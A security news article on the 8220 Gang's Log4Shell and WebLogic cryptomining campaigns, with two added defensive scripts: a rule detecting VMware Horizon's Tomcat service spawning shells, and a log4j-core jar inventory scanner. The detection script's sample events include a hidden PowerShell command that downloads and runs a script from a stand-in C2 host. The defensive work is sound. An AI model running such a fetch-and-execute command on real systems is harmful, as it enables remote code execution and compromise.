8220 Gang still exploits Log4Shell for cryptomining

May 9, 2023

The notorious cybercriminal group 8220 Gang is still exploiting the critical Log4Shell flaw, disclosed in late 2021, to deploy CoinMiner on VMware Horizon servers as part of its cryptocurrency mining campaign.

Researchers explained that the attack targets outdated, unpatched systems belonging to Korean energy-related firms, prioritising VMware Horizon servers that are still vulnerable to Log4Shell.

A sample log showed the CoinMiner malware being installed by a PowerShell command spawned from the ws_tomcatservice.exe process, a VMware Horizon component, which points to that process as the entry point the attackers exploited. The researchers noted, however, that they did not capture the exploitation packet itself.
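The parent/child relationship described above is the detection point a defender can act on: a Java-based web service such as Horizon's Tomcat wrapper has no routine reason to spawn PowerShell. The following script is an added example, not code from the original article or from AhnLab. It applies that rule to constructed Sysmon-style process-creation events (field names follow Sysmon Event ID 1); the events, file paths and download URL are constructed for illustration and are not real indicators.

```python
"""Detect VMware Horizon's Tomcat service spawning a shell.

Added example, not code from the original article or from AhnLab. It applies
the parent/child relationship described in the article (ws_tomcatservice.exe
launching a PowerShell command) to constructed Sysmon-style process-creation
events. Field names follow Sysmon Event ID 1; the events, paths and the
download URL are constructed, not real indicators.
"""
import json
import ntpath

# Horizon process the article names as the parent of the PowerShell command.
HORIZON_PARENT = "ws_tomcatservice.exe"

# Interpreters and script hosts a Java web service does not normally spawn.
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe",
                  "wscript.exe", "cscript.exe", "mshta.exe", "certutil.exe"}


def is_horizon_shell_spawn(event):
    """True when ws_tomcatservice.exe is the direct parent of a shell/script host."""
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    child = ntpath.basename(event.get("Image", "")).lower()
    return parent == HORIZON_PARENT and child in SHELL_CHILDREN


def detect(jsonl):
    """Parse JSON-lines events; return [(RecordId, child image, CommandLine), ...] for hits."""
    hits = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if is_horizon_shell_spawn(ev):
            hits.append((ev.get("RecordId"),
                         ntpath.basename(ev["Image"]).lower(),
                         ev.get("CommandLine", "")))
    return hits


# Constructed sample telemetry (JSON lines); not captured from a real host.
# Record 1: the service starting normally.  Record 3: an admin running PowerShell
# from Explorer.  Records 2 and 4: the Tomcat service spawning a shell (hits).
SAMPLE_EVENTS = r"""
{"RecordId": 1, "ParentImage": "C:\\Windows\\System32\\services.exe", "Image": "C:\\Program Files\\VMware\\VMware View\\Server\\bin\\ws_tomcatservice.exe", "CommandLine": "ws_tomcatservice.exe"}
{"RecordId": 2, "ParentImage": "C:\\Program Files\\VMware\\VMware View\\Server\\bin\\ws_tomcatservice.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://c2.example.invalid/a.ps1')"}
{"RecordId": 3, "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell Get-Service"}
{"RecordId": 4, "ParentImage": "C:\\Program Files\\VMware\\VMware View\\Server\\bin\\ws_tomcatservice.exe", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd /c whoami"}
"""

if __name__ == "__main__":
    for record_id, child, cmdline in detect(SAMPLE_EVENTS):
        print(f"ALERT record {record_id}: {HORIZON_PARENT} -> {child}: {cmdline}")
```

The rule deliberately keys on the parent image rather than on the PowerShell command line, so it fires regardless of how the payload is obfuscated; the same pattern applies to any Java service wrapper that is exposed to Log4Shell.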

Researchers noted that the 8220 Gang's use of Log4Shell in this attack is in line with its reputation for abusing known vulnerabilities, new and old, against systems that have not been patched.

Furthermore, the group recently exploited Oracle WebLogic vulnerabilities to download ScrubCrypt, which connects to attacker-controlled command-and-control servers to receive additional commands, such as installing the XMRig CoinMiner.

The 8220 Gang has increased the frequency of their attacks since the start of the year.

New investigations showed that the 8220 Gang has targeted Oracle WebLogic server flaws and used ScrubCrypt to evade security detection while running its crypto-mining campaigns.

The cybercriminal group uses a PowerShell script to download ScrubCrypt and gains persistence by modifying registry entries. Earlier this year, the group expanded its toolset, abusing cloud applications and Linux flaws to run a more sophisticated cryptomining campaign.

The 8220 Gang also used the onacroner script and frequently rotated its command-and-control IP addresses to evade detection.

The group has consistently installed XMRig CoinMiner to mine Monero on outdated systems. System administrators should therefore check which of their systems are exposed and apply the latest patches to avoid these threats.
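Checking which systems are exposed starts with finding every copy of log4j-core still in service, including jars bundled inside applications under other names. The script below is an added example, not code from the article or from AhnLab: it walks a directory tree, reads each jar's manifest to identify Log4j Core and its version, and reports whether the JndiLookup class is still present (removing it was the published mitigation for servers that could not upgrade). The version thresholds are the Apache fixes for CVE-2021-44228 (2.15.0, with backports 2.12.2 and 2.3.1); the later 2.17.1 / 2.12.4 / 2.3.2 releases close the follow-up CVEs and are the versions to upgrade to. The sample jars are constructed in a temporary directory so the script runs offline.

```python
"""Inventory log4j-core jars and flag those still exposed to Log4Shell.

Added example (not from the article or AhnLab). Walks a directory tree, reads
each jar's META-INF/MANIFEST.MF, and reports the Log4j Core version plus
whether JndiLookup.class is still present. The sample jars are constructed
in a temp directory; they are not real binaries.
"""
import os
import re
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
VERSION_RE = re.compile(r"^Implementation-Version:\s*(\S+)", re.MULTILINE)
TITLE_RE = re.compile(r"^Implementation-Title:\s*(.+?)\s*$", re.MULTILINE)


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); pre-release suffixes such as '-beta9' are dropped."""
    return tuple(int(p) for p in text.split("-")[0].split("."))


def log4shell_vulnerable(version):
    """True for Log4j 2.x builds whose JNDI lookups are still enabled by default.

    CVE-2021-44228 was fixed in 2.15.0, with backports 2.12.2 (Java 7) and
    2.3.1 (Java 6). Upgrade targets are 2.17.1 / 2.12.4 / 2.3.2.
    """
    if version[0] != 2:
        return False
    if version[:2] == (2, 12):
        return version < (2, 12, 2)
    if version[:2] == (2, 3):
        return version < (2, 3, 1)
    return version < (2, 15, 0)


def inspect_jar(path):
    """Return (version tuple, jndi_present) if the jar is Log4j Core, else None."""
    with zipfile.ZipFile(path) as zf:
        names = set(zf.namelist())
        if "META-INF/MANIFEST.MF" not in names:
            return None
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    title = TITLE_RE.search(manifest)
    version = VERSION_RE.search(manifest)
    if not title or not version or "Log4j Core" not in title.group(1):
        return None
    return parse_version(version.group(1)), JNDI_CLASS in names


def scan_tree(root):
    """Map relative jar path -> finding for every Log4j Core jar under root."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".jar"):
                continue
            path = os.path.join(dirpath, name)
            info = inspect_jar(path)
            if info is None:
                continue
            version, jndi = info
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            findings[rel] = {
                "version": ".".join(map(str, version)),
                "jndi_lookup_present": jndi,
                # Exposed only if the build is pre-fix AND the lookup class is still there.
                "vulnerable": log4shell_vulnerable(version) and jndi,
            }
    return findings


def exposed(findings):
    """Sorted list of jar paths that still need patching or mitigation."""
    return sorted(p for p, f in findings.items() if f["vulnerable"])


def build_sample_tree():
    """Constructed jars standing in for real deployments (hypothetical paths)."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")

    def make_jar(relpath, version, with_jndi, title="Apache Log4j Core"):
        path = os.path.join(root, relpath)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with zipfile.ZipFile(path, "w") as zf:
            zf.writestr("META-INF/MANIFEST.MF",
                        f"Manifest-Version: 1.0\nImplementation-Title: {title}\n"
                        f"Implementation-Version: {version}\n")
            if with_jndi:
                zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes

    make_jar("horizon/lib/log4j-core-2.14.1.jar", "2.14.1", True)        # exposed
    make_jar("app/WEB-INF/lib/renamed-logging.jar", "2.12.1", False)     # class removed
    make_jar("tools/lib/log4j-core-2.17.1.jar", "2.17.1", True)          # patched
    make_jar("tools/lib/log4j-api-2.14.1.jar", "2.14.1", False, title="Apache Log4j API")
    return root


if __name__ == "__main__":
    results = scan_tree(build_sample_tree())
    for jar, finding in sorted(results.items()):
        print(jar, finding)
    print("needs attention:", exposed(results))
```

Identifying the library by its manifest rather than its file name is what catches the renamed jar; matching on the `JndiLookup.class` entry separately is what keeps a mitigated-but-unpatched jar from being reported as exposed while still recording that it is running old code.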

In addition, companies should place externally reachable servers behind firewalls and similar security controls to limit attackers' access attempts. Organisations should maintain proper cybersecurity hygiene and update V3 to the latest version to prevent malware infection.
